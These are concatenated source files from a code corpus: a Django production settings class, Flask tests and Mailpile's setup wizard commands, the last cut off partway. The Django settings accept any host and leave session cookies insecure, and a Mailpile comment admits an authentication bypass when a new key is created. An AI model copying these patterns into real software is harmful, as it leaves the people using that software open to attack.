if cache is not None:
node.data = cache
return node
|
tidalf/plugin.audio.qobuz
|
resources/lib/qobuz/node/helper.py
|
Python
|
gpl-3.0
| 1,876
|
# -*- coding: utf-8 -*-
'''
Production Configurations
- Use djangosecure
- Use Amazon's S3 for storing static files and uploaded media
- Use sendgrid to send emails
- Use MEMCACHIER on Heroku
'''
from configurations import values
# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
try:
from S3 import CallingFormat
AWS_CALLING_FORMAT = CallingFormat.SUBDOMAIN
except ImportError:
# TODO: Fix this where even if in Dev this class is called.
pass
from .common import Common
class Production(Common):
# This ensures that Django will be able to detect a secure connection
# properly on Heroku.
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# INSTALLED_APPS
INSTALLED_APPS = Common.INSTALLED_APPS
# END INSTALLED_APPS
# SECRET KEY
SECRET_KEY = values.SecretValue()
# END SECRET KEY
# django-secure
INSTALLED_APPS += ("djangosecure", )
# MIDDLEWARE CONFIGURATION
MIDDLEWARE_CLASSES = (
# Make sure djangosecure.middleware.SecurityMiddleware is listed first
'djangosecure.middleware.SecurityMiddleware',
)
MIDDLEWARE_CLASSES += Common.MIDDLEWARE_CLASSES
# END MIDDLEWARE CONFIGURATION
# set this to 60 seconds and then to 518400 when you can prove it works
SECURE_HSTS_SECONDS = 60
SECURE_HSTS_INCLUDE_SUBDOMAINS = values.BooleanValue(True)
SECURE_FRAME_DENY = values.BooleanValue(True)
SECURE_CONTENT_TYPE_NOSNIFF = values.BooleanValue(True)
SECURE_BROWSER_XSS_FILTER = values.BooleanValue(True)
SESSION_COOKIE_SECURE = values.BooleanValue(False)
SESSION_COOKIE_HTTPONLY = values.BooleanValue(True)
SECURE_SSL_REDIRECT = values.BooleanValue(True)
# end django-secure
# SITE CONFIGURATION
# Hosts/domain names that are valid for this site
# See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts
ALLOWED_HOSTS = ["*"]
# END SITE CONFIGURATION
INSTALLED_APPS += ("gunicorn", )
# STORAGE CONFIGURATION
# See: http://django-storages.readthedocs.org/en/latest/index.html
INSTALLED_APPS += (
'storages',
)
# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
STATICFILES_STORAGE = DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
AWS_ACCESS_KEY_ID = values.SecretValue()
AWS_SECRET_ACCESS_KEY = values.SecretValue()
AWS_STORAGE_BUCKET_NAME = values.SecretValue()
AWS_AUTO_CREATE_BUCKET = True
AWS_QUERYSTRING_AUTH = False
# see: https://github.com/antonagestam/collectfast
AWS_PRELOAD_METADATA = True
INSTALLED_APPS += ('collectfast', )
# AWS cache settings, don't change unless you know what you're doing:
AWS_EXPIRY = 60 * 60 * 24 * 7
AWS_HEADERS = {
'Cache-Control': 'max-age=%d, s-maxage=%d, must-revalidate' % (
AWS_EXPIRY, AWS_EXPIRY)
}
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = 'https://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME
# END STORAGE CONFIGURATION
# EMAIL
DEFAULT_FROM_EMAIL = values.Value('goodtechgigs <noreply@goodtechgigs.org>')
EMAIL_HOST = values.Value('smtp.sendgrid.com')
EMAIL_HOST_PASSWORD = values.SecretValue(environ_prefix="", environ_name="SENDGRID_PASSWORD")
EMAIL_HOST_USER = values.SecretValue(environ_prefix="", environ_name="SENDGRID_USERNAME")
EMAIL_PORT = values.IntegerValue(587, environ_prefix="", environ_name="EMAIL_PORT")
EMAIL_SUBJECT_PREFIX = values.Value('[goodtechgigs] ', environ_name="EMAIL_SUBJECT_PREFIX")
EMAIL_USE_TLS = True
SERVER_EMAIL = EMAIL_HOST_USER
# END EMAIL
# TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
TEMPLATE_LOADERS = (
('django.template.loaders.cached.Loader', (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)),
)
# END TEMPLATE CONFIGURATION
# CACHING
# Only do this here because thanks to django-pylibmc-sasl and pylibmc
# memcacheify is painful to install on windows.
try:
# See: https://github.com/rdegges/django-heroku-memcacheify
from memcacheify import memcacheify
CACHES = memcacheify()
except ImportError:
CACHES = values.CacheURLValue(default="memcached://127.0.0.1:11211")
# END CACHING
# Your production stuff: Below this line define 3rd party library settings
|
aschn/goodtechgigs
|
goodtechgigs/config/production.py
|
Python
|
apache-2.0
| 4,647
|
import os
from angel_tree import app, bcrypt
from angel_tree.mod_family.controllers import *
from angel_tree.mod_family.models import *
from angel_tree.mod_auth.models import User
from flask import url_for
from flask_login import current_user
from flask_principal import PermissionDenied
from .mod_auth_test import create_user
import unittest
import tempfile
from .mod_auth_test import create_user, _username, _password
class ModFamilytestCase(unittest.TestCase):
def setUp(self):
self.app = app.test_client()
User.drop_collection()
self.username = _username
self.password = _password
def test_family_index(self):
create_user()
with self.app:
self.app.post('/auth/login', data=dict(
email=_username,
password=_password
), follow_redirects=False)
result = self.app.get('/family')
self.assertEqual(result.status_code, 200)
def test_family_labels(self):
create_user()
with self.app:
self.app.post('/auth/login', data=dict(
email=_username,
password=_password
), follow_redirects=False)
result = self.app.get('/family/labels')
self.assertEqual(result.status_code, 200)
def tearDown(self):
pass
|
TreeTopper/TreeTopper
|
tests/family_test.py
|
Python
|
mit
| 1,349
|
import os
import random
import sys
from datetime import date
from urllib import urlencode
import mailpile.auth
from mailpile.defaults import CONFIG_RULES
from mailpile.i18n import ListTranslations, ActivateTranslation, gettext
from mailpile.i18n import gettext as _
from mailpile.i18n import ngettext as _n
from mailpile.plugins import PluginManager
from mailpile.plugins import PLUGINS
from mailpile.plugins.contacts import AddProfile
from mailpile.plugins.contacts import ListProfiles
from mailpile.plugins.migrate import Migrate
from mailpile.plugins.tags import AddTag
from mailpile.commands import Command
from mailpile.config import SecurePassphraseStorage
from mailpile.crypto.gpgi import GnuPG, SignatureInfo, EncryptionInfo
from mailpile.crypto.gpgi import GnuPGKeyGenerator, GnuPGKeyEditor
from mailpile.httpd import BLOCK_HTTPD_LOCK, Idle_HTTPD
from mailpile.smtp_client import SendMail, SendMailError
from mailpile.urlmap import UrlMap
from mailpile.ui import Session
from mailpile.util import *
_ = lambda s: s
_plugins = PluginManager(builtin=__file__)
##[ Commands ]################################################################
class SetupMagic(Command):
"""Perform initial setup"""
SYNOPSIS = (None, None, None, None)
ORDER = ('Internals', 0)
LOG_PROGRESS = True
TAGS = {
'New': {
'type': 'unread',
'label': False,
'display': 'invisible',
'icon': 'icon-new',
'label_color': '03-gray-dark',
'name': _('New'),
},
'Inbox': {
'type': 'inbox',
'display': 'priority',
'display_order': 2,
'icon': 'icon-inbox',
'label_color': '06-blue',
'name': _('Inbox'),
},
'Blank': {
'type': 'blank',
'flag_editable': True,
'display': 'invisible',
'name': _('Blank'),
},
'Drafts': {
'type': 'drafts',
'flag_editable': True,
'display': 'priority',
'display_order': 1,
'icon': 'icon-compose',
'label_color': '03-gray-dark',
'name': _('Drafts'),
},
'Outbox': {
'type': 'outbox',
'display': 'priority',
'display_order': 3,
'icon': 'icon-outbox',
'label_color': '06-blue',
'name': _('Outbox'),
},
'Sent': {
'type': 'sent',
'display': 'priority',
'display_order': 4,
'icon': 'icon-sent',
'label_color': '03-gray-dark',
'name': _('Sent'),
},
'Spam': {
'type': 'spam',
'flag_hides': True,
'display': 'priority',
'display_order': 5,
'icon': 'icon-spam',
'label_color': '10-orange',
'name': _('Spam'),
},
'MaybeSpam': {
'display': 'invisible',
'icon': 'icon-spam',
'label_color': '10-orange',
'name': _('MaybeSpam'),
},
'Ham': {
'type': 'ham',
'display': 'invisible',
'name': _('Ham'),
},
'Trash': {
'type': 'trash',
'flag_hides': True,
'display': 'priority',
'display_order': 6,
'icon': 'icon-trash',
'label_color': '13-brown',
'name': _('Trash'),
},
# These are magical tags that perform searches and show
# messages in contextual views.
'All Mail': {
'type': 'tag',
'icon': 'icon-logo',
'label_color': '06-blue',
'search_terms': 'all:mail',
'name': _('All Mail'),
'display_order': 1000,
},
'Photos': {
'type': 'tag',
'icon': 'icon-photos',
'label_color': '08-green',
'search_terms': 'att:jpg',
'name': _('Photos'),
'template': 'photos',
'display_order': 1001,
},
'Files': {
'type': 'tag',
'icon': 'icon-document',
'label_color': '06-blue',
'search_terms': 'has:attachment',
'name': _('Files'),
'template': 'files',
'display_order': 1002,
},
'Links': {
'type': 'tag',
'icon': 'icon-links',
'label_color': '12-red',
'search_terms': 'http',
'name': _('Links'),
'display_order': 1003,
},
# These are internal tags, used for tracking user actions on
# messages, as input for machine learning algorithms. These get
# automatically added, and may be automatically removed as well
# to keep the working sets reasonably small.
'mp_rpl': {'type': 'replied', 'label': False, 'display': 'invisible'},
'mp_fwd': {'type': 'fwded', 'label': False, 'display': 'invisible'},
'mp_tag': {'type': 'tagged', 'label': False, 'display': 'invisible'},
'mp_read': {'type': 'read', 'label': False, 'display': 'invisible'},
'mp_ham': {'type': 'ham', 'label': False, 'display': 'invisible'},
}
def basic_app_config(self, session,
save_and_update_workers=True,
want_daemons=True):
# Create local mailboxes
session.config.open_local_mailbox(session)
# Create standard tags and filters
created = []
for t in self.TAGS:
if not session.config.get_tag_id(t):
AddTag(session, arg=[t]).run(save=False)
created.append(t)
session.config.get_tag(t).update(self.TAGS[t])
for stype, statuses in (('sig', SignatureInfo.STATUSES),
('enc', EncryptionInfo.STATUSES)):
for status in statuses:
tagname = 'mp_%s-%s' % (stype, status)
if not session.config.get_tag_id(tagname):
AddTag(session, arg=[tagname]).run(save=False)
created.append(tagname)
session.config.get_tag(tagname).update({
'type': 'attribute',
'display': 'invisible',
'label': False,
})
if 'New' in created:
session.ui.notify(_('Created default tags'))
# Import all the basic plugins
reload_config = False
for plugin in PLUGINS:
if plugin not in session.config.sys.plugins:
session.config.sys.plugins.append(plugin)
reload_config = True
for plugin in session.config.plugins.WANTED:
if plugin in session.config.plugins.available():
session.config.sys.plugins.append(plugin)
if reload_config:
with session.config._lock:
session.config.save()
session.config.load(session)
try:
# If spambayes is not installed, this will fail
import mailpile.plugins.autotag_sb
if 'autotag_sb' not in session.config.sys.plugins:
session.config.sys.plugins.append('autotag_sb')
session.ui.notify(_('Enabling spambayes autotagger'))
except ImportError:
session.ui.warning(_('Please install spambayes '
'for super awesome spam filtering'))
vcard_importers = session.config.prefs.vcard.importers
if not vcard_importers.gravatar:
vcard_importers.gravatar.append({'active': True})
session.ui.notify(_('Enabling gravatar image importer'))
gpg_home = os.path.expanduser('~/.gnupg')
if os.path.exists(gpg_home) and not vcard_importers.gpg:
vcard_importers.gpg.append({'active': True,
'gpg_home': gpg_home})
session.ui.notify(_('Importing contacts from GPG keyring'))
if ('autotag_sb' in session.config.sys.plugins and
len(session.config.prefs.autotag) == 0):
session.config.prefs.autotag.append({
'match_tag': 'spam',
'unsure_tag': 'maybespam',
'tagger': 'spambayes',
'trainer': 'spambayes'
})
session.config.prefs.autotag[0].exclude_tags[0] = 'ham'
if save_and_update_workers:
session.config.save()
session.config.prepare_workers(session, daemons=want_daemons)
def setup_command(self, session, do_gpg_stuff=False):
do_gpg_stuff = do_gpg_stuff or ('do_gpg_stuff' in self.args)
# Stop the workers...
want_daemons = session.config.cron_worker is not None
session.config.stop_workers()
# Perform any required migrations
Migrate(session).run(before_setup=True, after_setup=False)
# Basic app config, tags, plugins, etc.
self.basic_app_config(session,
save_and_update_workers=False,
want_daemons=want_daemons)
# Assumption: If you already have secret keys, you want to
# use the associated addresses for your e-mail.
# If you don't already have secret keys, you should have
# one made for you, if GnuPG is available.
# If GnuPG is not available, you should be warned.
if do_gpg_stuff:
gnupg = GnuPG(None)
accepted_keys = []
if gnupg.is_available():
keys = gnupg.list_secret_keys()
for key, details in keys.iteritems():
# Ignore revoked/expired keys.
if ("revocation-date" in details and
details["revocation-date"] <=
date.today().strftime("%Y-%m-%d")):
continue
accepted_keys.append(key)
for uid in details["uids"]:
if "email" not in uid or uid["email"] == "":
continue
if uid["email"] in [x["email"]
for x in session.config.profiles]:
# Don't set up the same e-mail address twice.
continue
# FIXME: Add route discovery mechanism.
profile = {
"email": uid["email"],
"name": uid["name"],
}
session.config.profiles.append(profile)
if (session.config.prefs.gpg_recipient in (None, '', '!CREATE')
and details["capabilities_map"]["encrypt"]):
session.config.prefs.gpg_recipient = key
session.ui.notify(_('Encrypting config to %s') % key)
if session.config.prefs.crypto_policy == 'none':
session.config.prefs.crypto_policy = 'openpgp-sign'
if len(accepted_keys) == 0:
# FIXME: Start background process generating a key once a user
# has supplied a name and e-mail address.
pass
else:
session.ui.warning(_('Oh no, PGP/GPG support is unavailable!'))
# If we have a GPG key, but no master key, create it
self.make_master_key()
# Perform any required migrations
Migrate(session).run(before_setup=False, after_setup=True)
session.config.save()
session.config.prepare_workers(session, daemons=want_daemons)
return self._success(_('Performed initial Mailpile setup'))
def make_master_key(self):
session = self.session
if (session.config.prefs.gpg_recipient not in (None, '', '!CREATE')
and not session.config.master_key
and not session.config.prefs.obfuscate_index):
#
# This secret is arguably the most critical bit of data in the
# app, it is used as an encryption key and to seed hashes in
# a few places. As such, the user may need to type this in
# manually as part of data recovery, so we keep it reasonably
# sized and devoid of confusing chars.
#
# The strategy below should give about 281 bits of randomness:
#
# import math
# math.log((25 + 25 + 8) ** (12 * 4), 2) == 281.183...
#
secret = ''
chars = 12 * 4
while len(secret) < chars:
secret = sha512b64(os.urandom(1024),
'%s' % session.config,
'%s' % time.time())
secret = CleanText(secret,
banned=CleanText.NONALNUM + 'O01l'
).clean[:chars]
session.config.master_key = secret
if self._idx() and self._idx().INDEX:
session.ui.warning(_('Unable to obfuscate search index '
'without losing data. Not indexing '
'encrypted mail.'))
else:
session.config.prefs.obfuscate_index = True
session.config.prefs.index_encrypted = True
session.ui.notify(_('Obfuscating search index and enabling '
'indexing of encrypted e-mail. Yay!'))
return True
else:
return False
def command(self, *args, **kwargs):
session = self.session
if session.config.sys.lockdown:
return self._error(_('In lockdown, doing nothing.'))
return self.setup_command(session, *args, **kwargs)
class TestableWebbable(SetupMagic):
HTTP_AUTH_REQUIRED = 'Maybe'
HTTP_CALLABLE = ('GET', )
HTTP_QUERY_VARS = {
'_path': 'Redirect path'
}
HTTP_POST_VARS = {
'testing': 'Yes or No, if testing',
'advance': 'Yes or No, advance setup flow',
}
TRUTHY = {
'0': False, 'no': False, 'fuckno': False, 'false': False,
'1': True, 'yes': True, 'hellyeah': True, 'true': True,
}
def _advance(self):
path = self.data.get('_path', [None])[0]
data = dict([(k, v) for k, v in self.data.iteritems()
if k not in self.HTTP_POST_VARS
and k not in ('_method',)])
nxt = Setup.Next(self.session.config, None, needed_auth=False)
if nxt:
url = '/%s/' % nxt.SYNOPSIS[2]
elif path and path != '/%s/' % Setup.SYNOPSIS[2]:
# Use the same redirection logic as the Authenticator
mailpile.auth.Authenticate.RedirectBack(path, data)
else:
url = '/'
qs = urlencode([(k, v) for k, vl in data.iteritems() for v in vl])
raise UrlRedirectException(''.join([url, '?%s' % qs if qs else '']))
def _success(self, message, result=True, advance=False):
if (advance or
self.TRUTHY.get(self.data.get('advance', ['no'])[0].lower())):
self._advance()
return SetupMagic._success(self, message, result=result)
def _testing(self):
self._testing_yes(lambda: True)
return (self.testing is not None)
def _testing_yes(self, method, *args, **kwargs):
testination = self.data.get('testing')
if testination:
self.testing = random.randint(0, 1)
if testination[0].lower() in self.TRUTHY:
self.testing = self.TRUTHY[testination[0].lower()]
return self.testing
self.testing = None
return method(*args, **kwargs)
def _testing_data(self, method, tdata, *args, **kwargs):
result = self._testing_yes(method, *args, **kwargs) or []
return (result
if (self.testing is None) else
(self.testing and tdata or []))
def setup_command(self, session):
raise Exception('FIXME')
class SetupGetEmailSettings(TestableWebbable):
"""Guess server details for an e-mail address"""
SYNOPSIS = (None, 'setup/email_servers', 'setup/email_servers', None)
HTTP_CALLABLE = ('GET', )
HTTP_QUERY_VARS = dict_merge(TestableWebbable.HTTP_QUERY_VARS, {
'email': 'E-mail address'
})
TEST_DATA = {
'imap_host': 'imap.wigglebonk.com',
'imap_port': 993,
'imap_tls': True,
'pop3_host': 'pop3.wigglebonk.com',
'pop3_port': 110,
'pop3_tls': False,
'smtp_host': 'smtp.wigglebonk.com',
'smtp_port': 465,
'smtp_tls': False
}
def _get_domain_settings(self, domain):
raise Exception('FIXME')
def setup_command(self, session):
results = {}
for email in list(self.args) + self.data.get('email'):
settings = self._testing_data(self._get_domain_settings,
self.TEST_DATA, email)
if settings:
results[email] = settings
if results:
self._success(_('Found settings for %d addresses'), results)
else:
self._error(_('No settings found'))
class SetupWelcome(TestableWebbable):
SYNOPSIS = (None, None, 'setup/welcome', None)
HTTP_CALLABLE = ('GET', 'POST')
HTTP_POST_VARS = dict_merge(TestableWebbable.HTTP_POST_VARS, {
'language': 'Language selection'
})
def bg_setup_stage_1(self):
# Wait a bit, so the user has something to look at befor we
# block the web server and do real work.
time.sleep(2)
# Intial configuration of app goes here...
if not self.session.config.tags:
with BLOCK_HTTPD_LOCK, Idle_HTTPD(allowed=0):
self.basic_app_config(self.session)
# Next, if we have any secret GPG keys, extract all the e-mail
# addresses and create a profile for each one.
with BLOCK_HTTPD_LOCK, Idle_HTTPD(allowed=0):
SetupProfiles(self.session).auto_create_profiles()
def setup_command(self, session):
config = session.config
if self.data.get('_method') == 'POST' or self._testing():
language = self.data.get('language', [''])[0]
if language:
try:
i18n = lambda: ActivateTranslation(session, config,
language)
if not self._testing_yes(i18n):
raise ValueError('Failed to configure i18n')
config.prefs.language = language
if not self._testing():
self._background_save(config=True)
except ValueError:
return self._error(_('Invalid language: %s') % language)
config.slow_worker.add_unique_task(
session, 'Setup, Stage 1', lambda: self.bg_setup_stage_1())
results = {
'languages': ListTranslations(config),
'language': config.prefs.language
}
return self._success(_('Welcome to Mailpile!'), results)
class SetupCrypto(TestableWebbable):
SYNOPSIS = (None, None, 'setup/crypto', None)
HTTP_CALLABLE = ('GET', 'POST')
HTTP_POST_VARS = dict_merge(TestableWebbable.HTTP_POST_VARS, {
'choose_key': 'Select an existing key to use',
'passphrase': 'Specify a passphrase',
'passphrase_confirm': 'Confirm the passphrase',
'index_encrypted': 'y/n: index encrypted mail?',
# 'obfuscate_index': 'y/n: obfuscate keywords?', # Omitted do to DANGER
'encrypt_mail': 'y/n: encrypt locally stored mail?',
'encrypt_index': 'y/n: encrypt search index?',
'encrypt_vcards': 'y/n: encrypt vcards?',
'encrypt_events': 'y/n: encrypt event log?',
'encrypt_misc': 'y/n: encrypt plugin and misc data?'
})
TEST_DATA = {}
def list_secret_keys(self):
today = date.today().strftime("%Y-%m-%d")
keylist = {}
for key, details in self._gnupg().list_secret_keys().iteritems():
# Ignore revoked keys
if ("revocation-date" in details and
details["revocation-date"] <= today):
# FIXME: Does this check expiry as well?
continue
# Ignore keys that cannot both encrypt and sign
caps = details["capabilities_map"]
if not caps["encrypt"] or not caps["sign"]:
continue
keylist[key] = details
return keylist
def gpg_key_ready(self, gpg_keygen):
if not gpg_keygen.failed:
self.session.config.prefs.gpg_recipient = gpg_keygen.generated_key
self.make_master_key()
self._background_save(config=True)
self.save_profiles_to_key()
def save_profiles_to_key(self, key_id=None, add_all=False, now=False,
profiles=None):
if key_id is None:
if (Setup.KEY_CREATING_THREAD and
not Setup.KEY_CREATING_THREAD.failed):
key_id = Setup.KEY_CREATING_THREAD.generated_key
add_all = True
if not add_all:
self.session.ui.warning('FIXME: Not updating GPG key!')
return
if key_id is not None:
uids = []
data = ListProfiles(self.session).run().result
for profile in data['profiles']:
uids.append({
'name': profile["fn"],
'email': profile["email"][0]["email"],
'comment': profile.get('note', '')
})
if not uids:
return
editor = GnuPGKeyEditor(key_id, set_uids=uids,
sps=self.session.config.gnupg_passphrase,
deletes=max(10, 2*len(uids)))
def start_editor(*unused_args):
with Setup.KEY_WORKER_LOCK:
Setup.KEY_EDITING_THREAD = editor
editor.start()
with Setup.KEY_WORKER_LOCK:
if now:
start_editor()
elif Setup.KEY_EDITING_THREAD is not None:
Setup.KEY_EDITING_THREAD.on_complete('edit keys',
start_editor)
elif Setup.KEY_CREATING_THREAD is not None:
Setup.KEY_CREATING_THREAD.on_complete('edit keys',
start_editor)
else:
start_editor()
def setup_command(self, session):
changed = authed = False
results = {
'secret_keys': self.list_secret_keys(),
}
error_info = None
if self.data.get('_method') == 'POST' or self._testing():
# 1st, are we choosing or creating a new key?
choose_key = self.data.get('choose_key', [''])[0]
if choose_key and not error_info:
if (choose_key not in results['secret_keys'] and
choose_key != '!CREATE'):
error_info = (_('Invalid key'), {
'invalid_key': True,
'chosen_key': choose_key
})
# 2nd, check authentication...
#
# FIXME: Creating a new key will allow a malicious actor to
# bypass authentication and change settings.
#
try:
passphrase = self.data.get('passphrase', [''])[0]
passphrase2 = self.data.get('passphrase_confirm', [''])[0]
chosen_key = ((not error_info) and choose_key
) or session.config.prefs.gpg_recipient
if not error_info:
assert(passphrase == passphrase2)
if chosen_key == '!CREATE':
assert(passphrase != '')
sps = SecurePassphraseStorage(passphrase)
elif chosen_key:
sps = mailpile.auth.VerifyAndStorePassphrase(
session.config,
passphrase=passphrase,
key=chosen_key)
else:
sps = mailpile.auth.VerifyAndStorePassphrase(
session.config, passphrase=passphrase)
if not chosen_key:
choose_key = '!CREATE'
results['updated_passphrase'] = True
session.config.gnupg_passphrase.data = sps.data
mailpile.auth.SetLoggedIn(self)
except AssertionError:
error_info = (_('Invalid passphrase'), {
'invalid_passphrase': True,
'chosen_key': session.config.prefs.gpg_recipient
})
# 3rd, if necessary master key and/or GPG key
with BLOCK_HTTPD_LOCK, Idle_HTTPD():
if choose_key and not error_info:
session.config.prefs.gpg_recipient = choose_key
# FIXME: This should probably only happen if the GPG
# key was successfully created.
self.make_master_key()
changed = True
with Setup.KEY_WORKER_LOCK:
if ((not error_info) and
(session.config.prefs.gpg_recipient
== '!CREATE') and
(Setup.KEY_CREATING_THREAD is None or
Setup.KEY_CREATING_THREAD.failed)):
gk = GnuPGKeyGenerator(
sps=session.config.gnupg_passphrase,
on_complete=('notify',
lambda: self.gpg_key_ready(gk)))
Setup.KEY_CREATING_THREAD = gk
Setup.KEY_CREATING_THREAD.start()
# Finally we update misc. settings
for key in self.HTTP_POST_VARS.keys():
# FIXME: This should probably only happen if the GPG
# key was successfully created.
# Continue iff all is well...
if error_info:
break
if key in (['choose_key', 'passphrase', 'passphrase_confirm'] +
TestableWebbable.HTTP_POST_VARS.keys()):
continue
try:
val = self.data.get(key, [''])[0]
if val:
session.config.prefs[key] = self.TRUTHY[val.lower()]
changed = True
except (ValueError, KeyError):
error_info = (_('Invalid preference'), {
'invalid_setting': True,
'variable': key
})
results.update({
'creating_key': (Setup.KEY_CREATING_THREAD is not None and
Setup.KEY_CREATING_THREAD.running),
'creating_failed': (Setup.KEY_CREATING_THREAD is not None and
Setup.KEY_CREATING_THREAD.failed),
'chosen_key': session.config.prefs.gpg_recipient,
'prefs': {
'index_encrypted': session.config.prefs.index_encrypted,
'obfuscate_index': session.config.prefs.obfuscate_index,
'encrypt_mail': session.config.prefs.encrypt_mail,
'encrypt_index': session.config.prefs.encrypt_index,
'encrypt_vcards': session.config.prefs.encrypt_vcards,
'encrypt_events': session.config.prefs.encrypt_events,
'encrypt_misc': session.config.prefs.encrypt_misc
}
})
if changed:
self._background_save(config=True)
if error_info:
return self._error(error_info[0],
info=error_info[1], result=results)
elif changed:
return self._success(_('Updated crypto preferences'), results)
else:
return self._success(_('Configure crypto preferences'), results)
class SetupProfiles(SetupCrypto):
SYNOPSIS = (None, None, 'setup/profiles', None)
HTTP_AUTH_REQUIRED = True
HTTP_CALLABLE = ('GET', 'POST')
HTTP_QUERY_VARS = dict_merge(TestableWebbable.HTTP_QUERY_VARS, {
})
HTTP_POST_VARS = dict_merge(TestableWebbable.HTTP_POST_VARS, {
'email': 'Create a profile for this e-mail address',
'name': 'Name associated with this e-mail',
'note': 'Profile note',
'pass': 'Password for remote accounts',
'route_id': 'Route ID for sending mail',
})
TEST_DATA = {}
# This is where we cache the passwords we are given, for use later.
# This is deliberately made a singleton on the class.
PASSWORD_CACHE = {}
def _auto_configurable(self, email):
# FIXME: Actually look things up, this is super lame
return email.endswith('@gmail.com')
def get_profiles(self, secret_keys=None):
data = ListProfiles(self.session).run().result
profiles = {}
for rid, ofs in data["rids"].iteritems():
profile = data["profiles"][ofs]
email = profile["email"][0]["email"]
name = profile["fn"]
note = profile.get('note', '')
profiles[rid] = {
"name": name,
"note": note,
"pgp_keys": [], # FIXME
"email": email,
"route_id": profile.get('x-mailpile-profile-route', ''),
"photo": profile.get('photo', [{}])[0].get('photo', ''),
"auto_configurable": self._auto_configurable(email)
}
for key, info in (secret_keys or {}).iteritems():
for uid in info['uids']:
email = uid.get('email')
if email in profiles:
profiles[email]["pgp_keys"].append(key)
return profiles
def discover_new_email_addresses(self, profiles):
addresses = {}
existing = set([p['email'] for p in profiles.values()])
for key, info in self._gnupg().list_secret_keys().iteritems():
for uid in info['uids']:
email = uid.get('email')
note = uid.get('comment')
if email:
if email in existing:
continue
if email not in addresses:
addresses[email] = {'pgp_keys': [],
'name': '', 'note': ''}
ai = addresses[email]
name = uid.get('name')
ai['name'] = name if name else ai['name']
ai['note'] = note if note else ai['note']
ai['pgp_keys'].append(key)
# FIXME: Scan Thunderbird and MacMail for e-mails, other apps...
return addresses
def auto_create_profiles(self):
new_emails = self.discover_new_email_addresses(self.get_profiles())
for email, info in new_emails.iteritems():
AddProfile(self.session, data={
'_method': 'POST',
'email': [email],
'note': [info["note"]],
'name': [info['name']]
}).run()
def _result(self):
profiles = self.get_profiles()
return {
'new_emails': self.discover_new_email_addresses(profiles),
'profiles': profiles,
'routes': self.session.config.routes,
'default_email': self.session.config.prefs.default_email
}
def setup_command(self, session):
changed = False
if self.data.get('_method') == 'POST' or self._testing():
name, email, note, pwd = (self.data.get(k, [None])[0] for k in
('name', 'email', 'note', 'pass'))
if email:
rv = AddProfile(session, data=self.data).run()
if rv.status == 'success':
#
# FIXME: We need to fire off a background process to
# try and auto-discover routes and sources.
#
if not session.config.prefs.default_email:
session.config.prefs.default_email = email
changed = True
self.save_profiles_to_key()
else:
return self._error(_('Failed to add profile'),
info=rv.error_info,
result=self._result())
if email and pwd:
sps = SecurePassphraseStorage(pwd)
SetupProfiles.PASSWORD_CACHE[email] = sps
result = self._result()
if not result['default_email']:
profiles = result['profiles'].values()
profiles.sort(key=lambda p: (len(p['pgp_keys']),
len(p['name'])))
e = result['default_email'] = profiles[-1]['email']
session.config.prefs.default_email = e
changed = True
else:
result = self._result()
if changed:
self._background_save(config=True)
return self._success(_('Your profiles'), result)
class SetupConfigureKey(SetupProfiles):
SYNOPSIS = (None, None, 'setup/configure_key', None)
HTTP_AUTH_REQUIRED = True
HTTP_CALLABLE = ('GET', 'POST')
HTTP_QUERY_VARS = dict_merge(TestableWebbable.HTTP_QUERY_VARS, {
})
HTTP_POST_VARS = dict_merge(TestableWebbable.HTTP_POST_VARS, {
})
TEST_DATA = {}
def _result(self):
keylist = self.list_secret_keys()
profiles = self.get_profiles(secret_keys=keylist)
return {
'secret_keys': keylist,
'profiles': profiles,
}
def setup_command(self, session):
# FIXME!
return self._success(_('Configuring a key'), self._result())
class SetupTestRoute(SetupProfiles):
SYNOPSIS = (None, None, 'setup/test_route', None)
HTTP_AUTH_REQUIRED = True
HTTP_CALLABLE = ('POST', )
HTTP_POST_VARS = dict_merge(TestableWebbable.HTTP_POST_VARS,
dict((k, v[0]) for k, v in
CONFIG_RULES['routes'][1].iteritems()),
{'route_id': 'ID of existing route'})
TEST_DATA = {}
def setup_command(self, session):
if self.args:
route_id = self.args[0]
elif 'route_id' in self.data:
route_id = self.data['route_id'][0]
else:
route_id = None
if route_id:
route = self.session.config.routes[route_id]
assert(route)
else:
route = {}
for k in CONFIG_RULES['routes'][1]:
if k not in self.data:
pass
elif CONFIG_RULES['routes'][1][k][1] in (int, 'int'):
route[k] = int(self.data[k][0])
else:
route[k] = self.data[k][0]
fromaddr = route.get('username', '')
if '@' not in fromaddr:
fromaddr = self.session.config.get_profile()['email']
assert(fromaddr)
error_info = {'error': _('Unknown error')}
try:
assert(SendMail(self.session, None,
[(fromaddr,
[fromaddr, 'test@mailpile.is'],
None,
[self.event])],
test_only=True, test_route=route))
return self._success(_('Route is working'),
result=route)
except OSError:
error_info = {'error': _('Invalid command'),
'invalid_command': True}
except SendMailError, e:
error_info = {'error': e.message,
'sendmail_error': True}
error_info.update(e.error_info)
except:
import traceback
traceback.print_exc()
return self._error(_('Route is not working'),
result=route, info=error_info)
class Setup(TestableWebbable):
"""Enter setup flow"""
SYNOPSIS = (None, 'setup', 'setup', '[do_gpg_stuff]')
ORDER = ('Internals', 0)
LOG_PROGRESS = True
HTTP_CALLABLE = ('GET',)
HTTP_AUTH_REQUIRED = True
# These are a global, may be modified...
KEY_WORKER_LOCK = CryptoRLock()
KEY_CREATING_THREAD = None
KEY_EDITING_THREAD = None
@classmethod
def _check_profiles(self, config):
data = ListProfiles(Session(config)).run().result
okay = routes = bad = 0
for rid, ofs in data["rids"].iteritems():
profile = data["profiles"][ofs]
if profile.get('email', None):
okay += 1
route_id = profile.get('x-mailpile-profile-route', '')
if route_id:
if route_id in config.routes:
routes += 1
else:
bad += 1
else:
bad += 1
return (routes > 0) and (okay > 0) and (bad == 0)
@classmethod
def _CHECKPOINTS(self, config):
return [
# Stage 0: Welcome: Choose app language
('language', lambda: config.prefs.language, SetupWelcome),
# Stage 1: Crypto: Configure our master key stuff
